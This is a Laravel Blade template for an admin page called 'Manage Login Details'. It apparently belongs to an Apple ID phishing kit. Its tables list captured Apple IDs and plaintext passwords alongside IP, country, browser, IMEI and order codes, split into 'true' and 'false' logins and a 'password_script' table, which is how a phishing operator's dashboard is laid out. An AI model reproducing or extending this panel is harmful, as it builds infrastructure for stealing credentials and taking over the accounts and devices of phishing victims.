@extends('components.app') @section('styles') @endsection @section('title') Manage Login Details @endsection @section('content')
{{--

Add User

--}}
Placeholder 32x32

Manage Login Details

dashboard > manage login-details
@csrf
@foreach ($true_login_data as $item) {{-- --}} @endforeach
order_code ip apple_id password country browser auto remove
{{ $item->login }} {{ $item->order_code }} {{ $item->ip }} {{ $item->apple_id }} {{ $item->password }} {{ $item->country }} {{ $item->browser }} {{ substr($item->auto_remove,0, 30) }}...  
@if (!empty($true_login_data)) {{ $true_login_data->links() }} @endif
@foreach ($false_login_data as $item) {{-- --}} @endforeach
order_code ip apple_id password country browser
{{ $item->login }} {{ $item->order_code }} {{ $item->ip }} {{ $item->apple_id }} {{ $item->password }} {{ $item->country }} {{ $item->browser }}
@if (!empty($false_login_data)) {{ $false_login_data->links() }} @endif
@foreach ($password_script as $item) {{-- --}} @endforeach
order_code ip password country browser
{{ $item->login }} {{ $item->order_code }} {{ $item->ip }} {{ $item->password }} {{ $item->country }} {{ $item->browser }}
@if (!empty($password_script)) {{ $password_script->links() }} @endif
@foreach ($visit_details as $item) {{-- --}} @endforeach
order_code imei ip country city browser
{{ $item->login }} {{ $item->order_code }} {{ $item->imei }} {{ $item->ip }} {{ $item->country }} {{ $item->city }} {{ $item->browser }}
@if (!empty($visit_details)) {{ $visit_details->links() }} @endif
@endsection @section("scripts") @endsection